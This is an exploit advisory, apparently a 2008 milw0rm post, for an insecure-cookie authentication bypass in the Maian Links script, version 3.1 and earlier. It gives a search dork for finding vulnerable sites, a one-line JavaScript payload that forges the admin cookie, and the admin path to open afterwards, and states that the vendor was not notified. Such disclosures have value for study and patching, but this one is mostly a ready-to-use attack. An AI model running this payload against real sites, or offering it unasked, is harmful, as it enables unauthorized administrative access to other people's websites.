42 lines
No EOL
1.1 KiB
Text
42 lines
No EOL
1.1 KiB
Text
-[*]+================================================================================+[*]-
|
|
-[*]+ Maian Links <= v3.1 Insecure Cookie Handling Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
|
|
|
|
[*] Discovered By: S.W.A.T.
|
|
[*] E-Mail: svvateam[at]yahoo[dot]com
|
|
[*] Script Download: http://www.maianscriptworld.co.uk
|
|
[*] DORK: Powered by: Maian Links v3.1
|
|
|
|
|
|
|
|
[*] Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
[*] DESCRIPTION:
|
|
|
|
Maian Links suffers from a insecure cookie, the admin panel only checks if the cookie
|
|
|
|
exists.
|
|
and not the content. so we can easyily craft a cookie and look like a admin.
|
|
|
|
|
|
|
|
[*] Vulnerability:
|
|
|
|
javascript:document.cookie = "links_cookie=1; path=/";
|
|
|
|
|
|
[*] NOTE/TIP:
|
|
|
|
after running the javascript, visit "/admin/index.php" to view admin area.
|
|
|
|
|
|
|
|
-[*]+================================================================================+[*]-
|
|
-[*]+ Maian Links <= v3.1 Insecure Cookie Handling Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
# milw0rm.com [2008-07-13] |